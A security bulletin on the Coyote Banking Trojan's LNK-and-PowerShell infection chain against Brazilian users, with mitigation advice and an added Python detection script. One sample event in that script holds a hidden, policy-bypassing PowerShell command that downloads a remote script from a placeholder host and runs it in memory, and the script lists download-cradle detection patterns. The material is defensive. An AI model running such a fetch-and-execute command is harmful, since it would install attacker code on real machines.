Summary: Brazilian Windows users are the target of an evolving malware campaign deploying the Coyote Banking Trojan, a sophisticated banking malware designed to steal financial credentials and sensitive information. Once installed, Coyote is capable of keylogging, capturing screenshots, and displaying phishing overlays to trick victims into revealing their credentials. Fortinet FortiGuard Labs discovered this recent wave of attacks, identifying multiple Windows Shortcut (LNK) files embedded with PowerShell commands that act as the initial infection vector. These commands retrieve the malware from a remote server, initiating a multi-stage infection process designed to evade detection.
First documented by Kaspersky in early 2024, Coyote initially targeted South American users, specifically Brazilian financial institutions, compromising over 70 financial applications. The earlier version used a Squirrel installer to execute a Node.js application compiled with Electron, which in turn launched a Nim-based loader to deploy the final payload. However, the latest attack sequence has evolved, leveraging LNK files to execute PowerShell commands that download and launch a secondary PowerShell script from a remote server. This script activates a loader, which ultimately executes an interim payload to establish persistence and deploy the final Coyote Banking Trojan.
Security Officer Comments: A notable enhancement in this recent variant is the expanded list of targeted entities, growing from financial applications to a broader scope of 1,030 sites and 73 financial institutions, including cryptocurrency exchanges and even hospitality-related websites. If an infected user attempts to visit one of these sites, the malware immediately contacts an attacker-controlled server, which determines the appropriate next step. Depending on the server’s response, the malware can capture screenshots, activate a keylogger, manipulate the display settings, or present phishing overlays to steal login credentials.
Suggested Corrections:
IOCs: https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files
- Restrict LNK and PowerShell Execution – Block LNK file execution from untrusted sources and limit PowerShell usage with Constrained Language Mode and script-block logging.
- Enhance Email & Web Security – Configure email security gateways to block LNK and script-based attachments, and use DNS filtering to prevent connections to known malicious domains.
- Endpoint & Network Monitoring – Deploy EDR solutions to detect registry modifications, unusual PowerShell execution, and outbound traffic to attacker-controlled servers.
- Enforce Least Privilege Access – Restrict admin privileges and prevent users from executing unauthorized scripts or modifying system settings.
- Regular System Updates & Patching – Keep Windows, security tools, and financial applications updated to mitigate exploits used by malware like Coyote.
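To illustrate the endpoint-monitoring item above (flagging PowerShell launched from a double-clicked shortcut with download-cradle traits), here is an added example that is not from the Fortinet or The Hacker News write-ups: a small Python triage rule run over constructed, Sysmon-style process-creation events. The field names, the sample command lines, the placeholder host and the alert threshold are assumptions made for the demo.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process create)
# fields. Not real telemetry; hosts and paths are placeholders built for the demo.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr http://stage.invalid/s.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc SQBFAFgA"},
]

# Each indicator is one trait of a shortcut-launched download cradle.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-enc(?:odedcommand)?\b", re.I),
    "remote_fetch": re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|https?://", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
}


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    cmd = event.get("CommandLine", "")
    matched = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    score = len(matched)
    # explorer.exe as the parent is how a double-clicked LNK surfaces in telemetry
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        matched.append("explorer_parent")
        score += 1
    return score, matched


def triage(events, threshold=3):
    """Return index, score and evidence for every event at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, matched = score_event(ev)
        if score >= threshold:
            hits.append({"index": i, "score": score, "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The threshold keeps a plain `-File` launch from explorer.exe (score 1) and a lone encoded command from a service host (score 1) below the alert line, while the hidden, policy-bypassing, fetch-and-execute launch scores 5; tune it against your own baseline before deploying.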
Link(s):
https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files
https://thehackernews.com/2025/02/coyote-malware-expands-reach-now.html